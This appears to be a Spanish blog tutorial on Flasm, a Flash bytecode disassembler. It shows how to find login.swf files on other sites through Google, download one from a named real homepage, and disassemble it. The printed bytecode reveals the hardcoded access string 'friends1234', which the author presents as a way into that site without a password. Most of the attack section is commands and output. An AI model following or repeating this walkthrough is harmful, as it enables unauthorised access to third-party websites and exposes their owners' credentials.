Flasm es un ensamblador/desensamblador de código de bytes de ActionScript para Flash. Usando Flasm, autores de scripts pueden aprender actionscript compilador y Flash Player.
Flasm desmonta el SWF completo, incluyendo todas las líneas de tiempo y eventos. En cuanto a desmontaje, a aprender cómo funciona el compilador de Flash, lo que mejora sus habilidades de ActionScript. Usted también puede hacer algunas optimizaciones en el código desmontados a mano o ajustar el código que desee. Flasm a continuación, aplica los cambios en el SWF original, en sustitución de las acciones originales. También es posible integrar las acciones Flasm en el código ActionScript.
Ubicacion:
Aplicaciones - Backtrack - Reverse-Engineering - Flasm
Abriendo desde la Terminal:
root@TioSam:~# cd /pentest/reverse-engineering/flasm
root@TioSam:/pentest/reverse-engineering/flasm# ls
CHANGES.TXT classic.css flasm flasm.html flasm.ini LICENSE.TXT logo.gif
root@TioSam:/pentest/reverse-engineering/flasm# ./flasm
Bypasseando login.html:
Nos dirigimos a Google, en el buscador colocamos login.swf entramos a alguna web que tenga el modulo login.html, copiamos toda la url y descargamos dicho login de la siguiente manera:
root@TioSam:~# wget http://homepage.ntlworld.com/michael.lepki/gallery/login.swf
Ojo: Cuando descarguemos el login.html, cambiemos la extensión a login.swf
Como vemos en la imagen, el login.swf se descargo perfectamente y se ha guardado en nuestra carpeta personal (root)
Ahora bien, para desamblar el login.swf tecleamos el siguiente comando:
root@TioSam:/pentest/reverse-engineering/flasm# ./flasm -d /root/login.swf
movie '/root/login.swf' // flash 5, total frames: 3, frame rate: 10 fps, 151x130 px
protect
defineButton 20
on overUpToOverDown
push 'V'
push '0'
push '1'
push 'String'
new
setVariable
push 'z'
push ''
push '1'
push 'String'
new
setVariable
push 'z'
push 'userBox'
getVariable
push 'passBox'
getVariable
concat
setVariable
push 'z'
getVariable
push 'friends1234'
stringEq
not
branchIfTrue label1
push 'V'
push '1'
setVariable
getURL 'http://homepage.ntlworld.com/michael.lepki/gallery/start.html' '_s
El login.swf se desamblo perfectamente.
Pero donde esta el usuario con la que entraremos al login?
El usuario se encuentra en push ,en este caso es 'friends1234' ahora con eso podemos dirigirnos a la web y lo colocaremos en "username" y así podremos ingresar a la web sin necesidad se colocar el password.
Increíble no? pues, si no entendistes, dejare una breve demostracion en el siguiente video:
Descargar Tool:
Saludos.
Me gusta lo que cuentas, pero esto no he podido hacerlo.
ResponderEliminar